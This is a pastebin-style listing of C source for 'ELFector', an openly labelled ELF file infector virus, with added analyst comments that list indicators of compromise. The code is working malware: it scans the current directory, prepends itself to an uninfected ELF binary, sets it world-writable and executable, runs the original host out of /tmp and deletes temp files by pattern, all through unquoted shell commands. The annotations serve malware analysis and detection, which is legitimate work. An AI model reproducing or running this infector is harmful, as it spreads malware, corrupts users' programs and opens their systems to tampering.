FlyFar

ELFector - A simple ELF file infector virus

Jul 7th, 2023
C 2.62 KB | Cybersecurity | 0 0
  1. #include<stdio.h>
  2. #include<stdlib.h>
  3. #include<string.h>
  4.  
  /*
   * is_file_infected - infection-marker check used by the sample.
   *
   * Builds the shell pipeline "strings <filename>| grep virus" with its output
   * redirected to /tmp/virussearch046.txt, runs it through system(), then
   * reads the first line of that temp file back.
   *
   * Returns non-zero when the text read from the temp file contains "virus".
   *
   * Analyst notes:
   *   - The marker is just the printable string "virus" somewhere in the file;
   *     presumably it matches the prepended program's own string literals
   *     (the command templates in this listing contain it). Any file that
   *     carries that string is treated as already infected.
   *   - Observable artifacts: a child shell running strings and grep, and the
   *     fixed temp file /tmp/virussearch046.txt.
   *   - filename is inserted into the command line as-is (no quoting).
   */
  5. int is_file_infected (char filename[])
  6. {
  7.     char output[400];
  8.     char command [400];
         /* Command template; snprintf bounds the write to sizeof command. */
  9.     snprintf(command, sizeof command, "%s%s%s", "strings ", filename, "| grep virus > /tmp/virussearch046.txt");
  10.     char inf[] = "virus";
  11.     FILE *finf;
          /* Runs the pipeline in a shell; the result lands in the temp file. */
  12.     system(&command[0]);   
  13.     finf = fopen("/tmp/virussearch046.txt", "r");
          /* Only the first line of grep's output is examined. */
  14.     fgets(output,399,finf);
  15.     return (strstr(output,inf) != NULL);
  16. }
  17.  
  /*
   * is_file_elf - target-selection check used by the sample.
   *
   * Runs "file <filename>" through system() with output redirected to
   * /tmp/elfsearch046.txt, reads the first line of that temp file and
   * returns non-zero when that line contains the substring "ELF".
   *
   * Analyst notes:
   *   - The sample does not parse the ELF header itself; it relies on the
   *     external file utility and a plain substring match on its output.
   *   - Observable artifacts: a child shell running file once per directory
   *     entry, and the fixed temp file /tmp/elfsearch046.txt.
   *   - filename is inserted into the command line as-is (no quoting).
   */
  18. int is_file_elf(char filename[])
  19. {
  20.     char command[200];
          /* Command template; snprintf bounds the write to sizeof command. */
  21.     snprintf(command, sizeof command, "%s%s%s", "file ", filename, " > /tmp/elfsearch046.txt");
  22.     char elf[] = "ELF";
  23.     char output[200];
  24.     FILE *file;
          /* Runs the file utility in a shell; the result lands in the temp file. */
  25.     system(&command[0]);
  26.     file = fopen("/tmp/elfsearch046.txt", "r");
          /* Only the first line of the utility's output is examined. */
  27.     fgets(output,199,file);
  28.     return (strstr(output,elf) != NULL);
  29. }
  30.  
  /*
   * main - entry point of the "ELFector" sample, a prepending file infector
   * that does all of its work by shelling out through system().
   *
   * Behaviour visible in this listing:
   *   1. Lists the current working directory into /tmp/contents046.txt.
   *   2. For the first listed entry that is_file_elf() accepts and that
   *      is_file_infected() reports as 0, rewrites that file as the contents
   *      of a file named "virus" (relative path) followed by the original
   *      file, then sets its mode to 777. The loop stops after one file.
   *   3. If argv[0] is "virus" or "./virus", removes the temp files and exits.
   *   4. Otherwise it treats argv[0] as an infected host: the size of the file
   *      "virus" is used as the offset of the original program inside argv[0],
   *      everything after that offset is copied to /tmp/target046, and that
   *      copy is made executable and run with the caller's arguments.
   *   5. Prints a banner and deletes every entry under /tmp whose name
   *      contains 046.
   *
   * Defender notes (all indicators below are literals from this listing):
   *   - Temp files: /tmp/contents046.txt, /tmp/elfsearch046.txt,
   *     /tmp/virussearch046.txt, /tmp/infect046.tmp, /tmp/target046.
   *   - Process activity: one program spawning shells for ls, file,
   *     strings with grep, cat, mv, chmod 777 and find with -delete,
   *     followed by execution of a binary located in /tmp.
   *   - On-disk effect: an ELF file in the working directory grows by the
   *     size of the prepended program and its mode becomes 777; file
   *     integrity monitoring on executables will see both changes.
   *   - Static strings: the banner text and the temp-file names above are
   *     embedded in the binary and are candidates for string-based rules.
   *   - The cleanup pattern is not limited to the sample's own files; any
   *     unrelated /tmp entry with 046 in its name is removed as well.
   */
  31. int main(int argc, char* argv[])
  32. {
  33.     FILE *fp;
  34.     FILE *virus_file,*target_file,*current_file;
  35.     char command[500];
  36.     char filename[100];
  37.    
          /* Directory enumeration is delegated to ls; scope is the current working directory only. */
  38.     system("ls > /tmp/contents046.txt");
  39.     fp = fopen("/tmp/contents046.txt", "r");
  40.     while (!feof(fp))
  41.     {
  42.         fgets(filename,300,fp);
              /* Drops the last character of the line read (the newline that ls emits). */
  43.         filename[strlen(filename)-1]='\0';
  44.         if(is_file_elf(filename))
  45.         {
  46.            if (is_file_infected(filename) == 0)
  47.             {
                      /*
                       * Replacement step: "virus" content + original file is staged in
                       * /tmp/infect046.tmp, moved over the original name, and the result
                       * is made world-readable, -writable and -executable (777).
                       */
  48.                 snprintf(command, sizeof command, "%s%s%s%s%s%s", "cat virus ", filename, " > /tmp/infect046.tmp;mv /tmp/infect046.tmp ", filename, ";chmod 777 ", filename);
  49.                 system(&command[0]);
                      /* At most one file is modified per execution. */
  50.                 break;
  51.             }
  52.            
  53.         }
  54.     }
          /* Running under the name "virus": there is no appended host program to hand over to. */
  55.     if(strcmp(argv[0],"virus") == 0 || strcmp(argv[0] , "./virus") == 0)
  56.     {
  57.         char delete_command[] = "find /tmp -name '*046*' -delete";
  58.         system(&delete_command[0]);
  59.         exit(0);       
  60.     }
  61.     else
  62.     {
  63.         char ch;int i;
              /* The length of the file "virus" in the working directory gives the host offset. */
  64.         virus_file = fopen("virus", "r");
  65.         fseek(virus_file,0,SEEK_END);
  66.         int end = ftell(virus_file);
  67.         fclose(virus_file);
  68.         current_file = fopen(argv[0],"r");
  69.         target_file = fopen("/tmp/target046","w");
              /* Skip the prepended part and copy the rest of argv[0] out byte by byte. */
  70.         fseek(current_file, end, SEEK_SET);
  71.         while (!feof(current_file))
  72.         {
  73.             ch = fgetc(current_file);
  74.             fputc(ch, target_file);
  75.         }
  76.         fclose(current_file);
  77.         fclose(target_file);
              /* The extracted copy is executed from /tmp; mounting /tmp noexec would presumably stop this hand-over. */
  78.         system("chmod 777 /tmp/target046");
  79.         if(argc==1)
  80.         {
  81.             system("/tmp/target046");
  82.         }
  83.         else
  84.         {
                  /* Rebuild the caller's argument list as one space-separated shell command line. */
  85.             char original_functionality[200] = "/tmp/target046 ";
  86.             for (i=2; i<=argc; i++)
  87.             {  
  88.                 if(i == argc)
  89.                     strcat(original_functionality, argv[i-1]);
  90.                 else
  91.                     {
  92.                         strcat(original_functionality, argv[i-1]);
  93.                         strcat(original_functionality, " ");
  94.                     }
  95.             }
  96.             system(&original_functionality[0]);        
  97.         }  
  98.     }
          /* Banner written to stdout after the extracted program returns; usable as a static string indicator. */
  99.     printf("My name is ELFector and thank you for running me!\n");
          /* Cleanup of the temp files by name pattern. */
  100.     char delete_command[] = "find /tmp -name '*046*' -delete";
  101.     system(&delete_command[0]);
  102.     return 0;
  103. }
  104.  